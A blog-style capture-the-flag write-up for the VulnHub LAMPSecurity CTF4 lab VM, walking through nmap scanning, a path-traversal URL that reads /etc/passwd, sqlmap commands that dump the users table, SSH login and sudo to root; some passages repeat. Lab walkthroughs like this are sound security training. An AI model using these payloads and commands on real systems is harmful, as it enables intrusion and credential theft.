Today we are going to see another CTF “LAMPSecurity CTF4” (//www.vulnhub.com/entry/lampsecurity-ctf4,83/).
The difficulty level will be for beginners, and the main objective will be to get the root privilege of the target system.
The VM is password protected and intentionally the credentials were not provided. Let’s give our best to break and escalate the root privilege.
The VM is password protected and intentionally the credentials were not provided. Let’s give our best to break and escalate the root privilege.
List of actions
1) Find the target
2) Scan for port and services
3) HTTP enumeration (LFI Exploitation)
4) SQLMAP scanning
5) Dump and crack the hashes
6) SSH login
7) Root privilege escalation
1) Find the target
2) Scan for port and services
3) HTTP enumeration (LFI Exploitation)
4) SQLMAP scanning
5) Dump and crack the hashes
6) SSH login
7) Root privilege escalation
Find the target
Try to find out the target VM by executing the following command
Finally, we got our target 172.16.2.45
Scan for port and services
In this step, we will scan for active ports and the running services
Nmap –A 172.16.2.45
Output
Port 22 ssh OpenSSH 4.3 Open
Port 25 SMTP Sendmail Open
Port 80 HTTP Apache Open
HTTP enumeration (LFI Exploitation)
Let’s navigate to the web application on port 80
Now when I put the below string in the browser address bar, it exposes LFI flaw by displaying the /etc/passwd file of the server.
http://172.16.2.45/index.html?page=../../../../../../etc/passwd
Also, I found SQL warning after tampering with “ ‘ ” at the end of the page URL.
http://172.16.2.45/index.html?page=blog&title=Blog&id=2’
Scanning with SQLMAP
Let’s scan the database with SQLMAP by execution the below command
Sqlmap –u “http://172.16.2.45/index.html?page=blog&title=Blog&id=5” –p id –tables
After the completion of the command, we will get several database details. But we will continue enumeration with ehks.
Dump and crack the hashes
In this section, we will enumerate ehks database to get the user table details
Sqlmap –u “http://172.16.2.45/index.html?page=blog&title=Blog&id=5” -p id –D ehks –T users –dump
We have successfully got the usernames and their credentials in the output.
SSH login
Let us take any user credentials to get the shell using SSH
Yay! We got our first restrictive shell in 172.16.2.45
Now let's check what is the restriction was applied on the current user account
Execute sudo -l in the command shell and see the output.
The above output is showing that there is no restriction over the user.
Root privilege escalation
Now I will try to get the root privilege by typing the below command
Sudo -i
Wow! Finally, we have got the root privilege of the system.
Thanks for reading my article on this CTF challenge. Please give your valuable feedback on the same in the below comment section.
0 comments:
Post a Comment